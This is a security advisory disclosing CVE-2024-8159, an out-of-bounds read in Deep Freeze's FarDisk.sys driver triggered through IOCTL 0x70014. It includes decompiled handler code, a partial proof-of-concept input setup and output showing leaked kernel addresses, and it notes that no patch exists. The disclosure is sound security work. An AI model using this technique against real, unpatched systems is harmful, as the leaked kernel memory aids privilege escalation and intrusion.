Deep Freeze - Out-of-bounds Read

Description

Deep Freeze 9.00.020.5760 is vulnerable to an out-of-bounds read vulnerability by triggering the 0x70014 IOCTL code of the FarDisk.sys driver.

Vulnerability

The 0x70014 IOCTL code of the FarDisk.sys driver allows performing an Out-of-bounds read.

The following is the handling code of the 0x70014 IOCTL:

 if ( CurrentStackLocation->Parameters.Create.Options >= 0x10 )
 {
 v10 = 0;
 Irp->IoStatus.Information = LODWORD(Irp->AssociatedIrp.SystemBuffer->MdlAddress);
      goto LABEL_73

When the nInBufferSize parameter of the IOCTL request is greater or equal than 0x10, the second DWORD of the user-controlled SystemBuffer is passed to the IO manager as the returned bytes for the IO response. This allows an attacker to control how many bytes to read past the allocated SystemBuffer memory block.

A snipped of the proof-of-concept code is the following:

((PDWORD64)((DWORD64)inBuf + 0))[0] = (ULONGLONG)0x4141414141414141;
((PDWORD64)((DWORD64)inBuf + 8))[0] = (ULONGLONG)0x4242424243434343;


DWORD IoControlCode = 0x70014;
InputBuffer = (ULONGLONG)inBuf;
DWORD InputBufferLength = 0x10;
OutputBuffer = (ULONGLONG)outBuf;
DWORD OutputBufferLength = 0x10

With that, the attacker can read 0x42424242 bytes from adjacent objects, leaking whatever the object leaked can have, including user and kernel addresses:

PS C:\Users\admin\Desktop> .\PoC.exe
[+] 0x70014: Bytes returned: 1111638594 (0x42424242)
[+] Truncated (0x50) output (0): 4141414141414141
[+] Truncated (0x50) output (8): 4242424242424242
[+] Truncated (0x50) output (16): 00007FFAFDAE7F04
[+] Truncated (0x50) output (24): 0000000000000000
[+] Truncated (0x50) output (32): 0000000000000000
[+] Truncated (0x50) output (40): 0000000000000000
[+] Truncated (0x50) output (48): 0000000000000000
[+] Truncated (0x50) output (56): 0000000000000000
[+] Truncated (0x50) output (64): FFFFAD81A464B998
[+] Truncated (0x50) output (72): 0000000000000001
[+] Truncated (0x50) output (80): 77776D4D02060000
[+] Truncated (0x50) output (88): 0000000000000000
[+] Truncated (0x50) output (96): 0000000000000000
[+] Truncated (0x50) output (104): FFFFAD819DCFB970
[+] Truncated (0x50) output (112): 0000000000000000
[+]

Our security policy

We have reserved the ID CVE-2024-8159 to refer to this issue from now on.

Disclosure policy

System Information

• Version: Deep Freeze 9.00.020.5760

• Operating System: Windows

Mitigation

There is currently no patch available for this vulnerability.

References

• Vendor page https://www.faronics.com/

• Product page https://www.faronics.com/es/products/deep-freeze